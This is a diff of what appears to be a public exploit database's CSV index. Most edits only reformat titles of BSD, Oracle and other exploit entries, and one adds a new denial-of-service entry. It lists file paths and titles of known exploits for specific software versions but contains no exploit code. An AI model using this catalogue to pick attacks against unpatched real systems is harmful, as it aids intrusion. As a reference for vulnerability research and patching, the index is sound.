 19531,platforms/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,dos,0
@ -2438,7 +2438,7 @@ id,file,description,date,author,platform,type,port
 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,windows,dos,0
 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0
 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0
-20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0
+20226,platforms/freebsd/dos/20226.c,"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0
 20228,platforms/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0
 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0
 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0
@ -3012,7 +3012,7 @@ id,file,description,date,author,platform,type,port
 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos,0
 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos,0
 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/Denial of Service",2003-11-19,3APA3A,windows,dos,0
-23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl - Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0
+23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0
 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0
@ -3220,7 +3220,7 @@ id,file,description,date,author,platform,type,port
 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0
 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0
 24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0
-24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd - Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0
+24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 - 'ftpd' Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0
 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0
 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0
 24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0
@ -3666,7 +3666,7 @@ id,file,description,date,author,platform,type,port
 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0
 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0
 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0
-28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0
+28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0
 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0
 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0
 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0
@ -3691,7 +3691,7 @@ id,file,description,date,author,platform,type,port
 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0
 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0
 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0
-29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
+29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0
 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0
 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0
@ -3982,7 +3982,7 @@ id,file,description,date,author,platform,type,port
 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0
 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0
-31550,platforms/bsd/dos/31550.c,"Multiple BSD Distributions - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0
+31550,platforms/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0
 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
@ -4172,7 +4172,7 @@ id,file,description,date,author,platform,type,port
 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0
 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0
 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,windows,dos,0
-33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0
+33058,platforms/multiple/dos/33058.txt,"BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0
 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0
 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0
 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123
@ -4225,7 +4225,7 @@ id,file,description,date,author,platform,type,port
 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0
 33314,platforms/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0
 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
-33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
+33319,platforms/bsd/dos/33319.txt,"BSD (Multiple Distributions) - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos,0
 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0
 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",hardware,dos,0
@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port
 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0
 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0
 35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0
-35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0
+35938,platforms/freebsd/dos/35938.txt,"FreeBSD - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0
 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0
 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0
 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0
@ -5065,7 +5065,7 @@ id,file,description,date,author,platform,type,port
 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
-39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
+39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0
 39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0
@ -5720,6 +5720,7 @@ id,file,description,date,author,platform,type,port
 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0
 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0
 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0
+43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5801,8 +5802,8 @@ id,file,description,date,author,platform,type,port
 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0
 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0
 285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Exploit",2001-03-03,kengz,linux,local,0
-286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation",2001-03-03,dethy,bsd,local,0
-287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0
+286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation",2001-03-03,dethy,bsd,local,0
+287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation",2001-03-03,dethy,bsd,local,0
 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0
 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0
 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0
@ -5839,7 +5840,7 @@ id,file,description,date,author,platform,type,port
 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
 394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0
 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0
-396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0
+396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Exploit",2002-01-01,Teso,bsd,local,0
 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0
 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0
@ -5877,7 +5878,7 @@ id,file,description,date,author,platform,type,port
 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
 718,platforms/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
-739,platforms/bsd/local/739.c,"FreeBSD /usr/bin/top - Format String",2001-07-23,truefinder,bsd,local,0
+739,platforms/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local,0
 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0
 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
@ -5987,7 +5988,7 @@ id,file,description,date,author,platform,type,port
 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0
 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0
 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0
-1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0
+1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local,0
 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0
 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit",2005-12-07,c0ntex,solaris,local,0
@ -6155,7 +6156,7 @@ id,file,description,date,author,platform,type,port
 3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0
-3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0
+3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0
 3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",linux,local,0
 3593,platforms/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0
 3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",linux,local,0
@ -6232,7 +6233,7 @@ id,file,description,date,author,platform,type,port
 4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0
 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0
-4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0
+4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0
 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
@ -6330,7 +6331,7 @@ id,file,description,date,author,platform,type,port
 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
-7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
+7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,windows,local,0
 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0
@ -6374,7 +6375,7 @@ id,file,description,date,author,platform,type,port
 7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0
 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0
 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0
-8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation",2009-02-16,kingcope,freebsd,local,0
+8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local,0
 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0
 8074,platforms/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local,0
 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0
@ -6406,7 +6407,7 @@ id,file,description,date,author,platform,type,port
 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
 8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0
-8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0
+8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation",2009-03-23,mu-b,freebsd,local,0
 8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0
 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,windows,local,0
 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
@ -6497,7 +6498,7 @@ id,file,description,date,author,platform,type,port
 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0
 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
 9072,platforms/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
-9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
+9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
 9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0
 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit",2009-07-09,kingcope,multiple,local,0
 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
@ -6561,7 +6562,7 @@ id,file,description,date,author,platform,type,port
 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0
 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0
 9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0
-9489,platforms/multiple/local/9489.txt,"Multiple BSD Distributions - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0
+9489,platforms/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0
 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,windows,local,0
 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0
 9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)",2009-08-24,mr_me,windows,local,0
@ -6838,7 +6839,7 @@ id,file,description,date,author,platform,type,port
 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0
 13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0
 13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0
-14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
+14002,platforms/freebsd/local/14002.c,"FreeBSD - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0
@ -7054,7 +7055,7 @@ id,file,description,date,author,platform,type,port
 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
